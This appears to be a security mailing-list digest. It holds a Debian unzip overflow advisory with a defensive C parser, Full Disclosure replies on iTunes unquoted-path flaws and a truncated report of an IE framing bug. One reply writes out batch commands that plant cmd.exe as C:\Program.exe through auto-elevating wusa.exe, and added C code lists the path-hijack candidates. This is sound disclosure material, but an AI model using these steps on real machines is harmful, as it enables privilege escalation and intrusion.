DSA-3152 unzip – security update

A flaw was found in the test_compr_eb() function allowing out-of-bounds
read and write access to memory locations. By carefully crafting a
corrupt ZIP archive an attacker can trigger a heap overflow, resulting
in an application crash or possibly other unspecified impact.
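
As an added example of the bug class this advisory describes (it is not unzip's code and does not reproduce test_compr_eb() itself), the C below walks a ZIP extra field with the bounds checks a crafted archive would otherwise get past. A ZIP extra field is a run of blocks, each with a 2-byte little-endian header ID and a 2-byte little-endian data size followed by that many data bytes; a parser that trusts the declared size indexes past the end of the buffer, which is an out-of-bounds read, and becomes an out-of-bounds write once the block is copied or inflated in place. The three input buffers are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example: a bounds-checked walker over a ZIP "extra field".
 * Layout (PKWARE appnote): repeated blocks of
 *   uint16 header ID (LE) | uint16 data size (LE) | data[size]
 * Illustrative code, not unzip's test_compr_eb(). */

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | ((uint16_t)p[1] << 8));
}

/* Walk every block, recording header IDs. Returns the block count, or
 * -1 when a header is truncated or a declared size runs past the end
 * of the buffer. Without the two checks marked below, a crafted size
 * lets the caller index or copy beyond ef[ef_len]: an out-of-bounds
 * read, and an out-of-bounds write if the block is copied or inflated. */
int walk_extra_field(const uint8_t *ef, size_t ef_len,
                     uint16_t *ids, size_t max_ids)
{
    size_t off = 0;
    int n = 0;

    while (off < ef_len) {
        if (ef_len - off < 4)               /* check 1: room for the header */
            return -1;
        uint16_t id   = rd16(ef + off);
        uint16_t size = rd16(ef + off + 2);
        if (size > ef_len - off - 4)        /* check 2: attacker-declared size */
            return -1;
        if (ids && (size_t)n < max_ids)
            ids[n] = id;
        n++;
        off += 4 + (size_t)size;
    }
    return n;
}

/* Constructed inputs (not taken from a real archive). */
int demo_wellformed(void)
{
    static const uint8_t ef[] = {
        0x01, 0x00, 0x02, 0x00, 0xAA, 0xBB,   /* ID 0x0001, 2 data bytes */
        0x55, 0x75, 0x00, 0x00                /* ID 0x7555, 0 data bytes */
    };
    uint16_t ids[4];
    return walk_extra_field(ef, sizeof ef, ids, 4);   /* 2 */
}

int demo_oversized(void)
{
    /* ID 0x0001 declares 0x7FFF data bytes but only 2 follow. */
    static const uint8_t ef[] = { 0x01, 0x00, 0xFF, 0x7F, 0x41, 0x42 };
    return walk_extra_field(ef, sizeof ef, NULL, 0);  /* -1 */
}

int demo_truncated_header(void)
{
    static const uint8_t ef[] = { 0x01, 0x00, 0x02 };  /* 3 bytes, header needs 4 */
    return walk_extra_field(ef, sizeof ef, NULL, 0);  /* -1 */
}

int main(void)
{
    printf("well-formed: %d blocks\n", demo_wellformed());
    printf("oversized size field: %d\n", demo_oversized());
    printf("truncated header: %d\n", demo_truncated_header());
    return 0;
}
```

The same size check has to sit in front of any memcpy or inflate that consumes a block, since an oversized declared length turns the read overrun into a write overrun at that point.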

Re: iTunes 12.1 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files…

Posted by Stefan Kanthak on Feb 02

"Brandon Perry" <bperry.volatile () gmail com> wrote:

Do you mean something like

REM stage a copy of cmd.exe and wrap it in a cabinet as Program.ex_
Copy %COMSPEC% Program.exe
MakeCAB.Exe Program.exe
Del Program.exe
REM let the auto-elevating wusa.exe extract it to the root of the system drive
WUSA.Exe "%CD%\Program.ex_" /Extract:%SystemDrive%

which according to the MSRC (which Apple usually refers to) does not qualify
since it only exploits the braindead autoelevation of the user account
control in its default setting, although every user of…

Re: iTunes 12.1 for Windows: still outdated and VULNERABLE 3rd party libraries, still UNQUOTED and VULNERABLE pathnames C:\Program Files…

Posted by Stefan Kanthak on Feb 02

"Brandon Perry" <bperry.volatile () gmail com> wrote:

Or do you mean exploits like this one:
<http://seclists.org/fulldisclosure/2014/May/163>

EVERY developer should know that

* his/her software is not the only application installed on a user's PC;

* the outdated or vulnerable components s/he delivers and installs can
be called by every other application or malware running on a user's PC!

JFTR: the MSVCRT DLL of Visual…
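
Both posts above carry the subject's "UNQUOTED and VULNERABLE pathnames C:\Program Files…", and the first one stages a Program.exe at %SystemDrive%. The C below, added here as an example (not Kanthak's or Apple's code), shows why that location matters: for an unquoted command line containing spaces, CreateProcess() tries each space-delimited prefix as an executable, starting with C:\Program.exe, before it reaches the intended binary. The search order follows the documented CreateProcess lpCommandLine behaviour; appending ".exe" to every prefix that lacks that extension is a simplification assumed for this illustration, and the service path is constructed, not an actual iTunes component.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example (not Apple's or Kanthak's code): enumerate the files
 * CreateProcess() tries, in order, for an unquoted command line that
 * contains spaces. Assumption for this illustration: ".exe" is appended
 * to every prefix that does not already end in ".exe". */

#define MAX_CANDS 16
#define CAND_LEN  260

static int ends_with_exe(const char *s)
{
    size_t n = strlen(s);
    if (n < 4) return 0;
    const char *t = s + n - 4;
    return t[0] == '.'
        && tolower((unsigned char)t[1]) == 'e'
        && tolower((unsigned char)t[2]) == 'x'
        && tolower((unsigned char)t[3]) == 'e';
}

/* 1 when the command line is exposed: no leading quote and at least
 * one space, so every prefix before a space is tried first. */
int needs_quoting(const char *cmdline)
{
    return cmdline[0] != '"' && strchr(cmdline, ' ') != NULL;
}

/* Write the candidate paths into out[] and return how many. A planted
 * file at any candidate before the last one runs instead of the real
 * binary, with the service's or caller's privileges. */
int hijack_candidates(const char *cmdline, char out[][CAND_LEN], int max)
{
    if (!needs_quoting(cmdline))
        return 0;
    size_t len = strlen(cmdline);
    int n = 0;
    for (size_t i = 1; i <= len && n < max; i++) {
        if (i != len && cmdline[i] != ' ')
            continue;                    /* split only at spaces or the end */
        if (i + 5 > CAND_LEN)
            break;                       /* room for ".exe" and NUL */
        memcpy(out[n], cmdline, i);
        out[n][i] = '\0';
        if (!ends_with_exe(out[n]))
            strcat(out[n], ".exe");
        n++;
    }
    return n;
}

/* Constructed service path for the demo; not a real iTunes component. */
static const char *DEMO_PATH =
    "C:\\Program Files\\Example Vendor\\Example Service\\svc.exe";

int demo_count(void)
{
    char c[MAX_CANDS][CAND_LEN];
    return hijack_candidates(DEMO_PATH, c, MAX_CANDS);      /* 4 */
}

int demo_candidate_is(int idx, const char *expected)
{
    char c[MAX_CANDS][CAND_LEN];
    int n = hijack_candidates(DEMO_PATH, c, MAX_CANDS);
    return idx < n && strcmp(c[idx], expected) == 0;
}

int main(void)
{
    char c[MAX_CANDS][CAND_LEN];
    int n = hijack_candidates(DEMO_PATH, c, MAX_CANDS);
    for (int i = 0; i < n; i++)
        printf("%d: %s\n", i + 1, c[i]);   /* 1: C:\Program.exe ... */
    return 0;
}
```

For the constructed path the first candidate is C:\Program.exe, which is exactly where a file extracted to %SystemDrive% under that name lands; quoting the ImagePath (leading quote) collapses the candidate list to nothing, which is the fix the subject line asks for.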

[Call For Papers] BSides Knoxville, TN – May 15th 2015

Posted by Adam Caudill on Feb 02

Calling all Makers, Hackers, Red Teams, Blue Teams, or anyone who wants to rant about security and privacy! The first
ever BSides Knoxville is scheduled for May 15th, 2015 @ Scruffy City Hall, and we’re looking for creative, cutting-edge
presentations. Whether you’ve devised a new attack against internet-connected gas pumps or discovered a new behavioral
analysis technique for identifying botnet C&C, we want to hear from you!…

Re: Major Internet Explorer Vulnerability – NOT Patched

Posted by Joey Fowler on Feb 02

Hi David,

“nice” is an understatement here.

I’ve done some testing with this one and, while there *are* quirks, it most
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don’t contain X-Frame-Options headers
(with `deny` or `same-origin` values), it executes successfully. Pending
the payload being injected, most Content Security Policies are also
bypassed (by…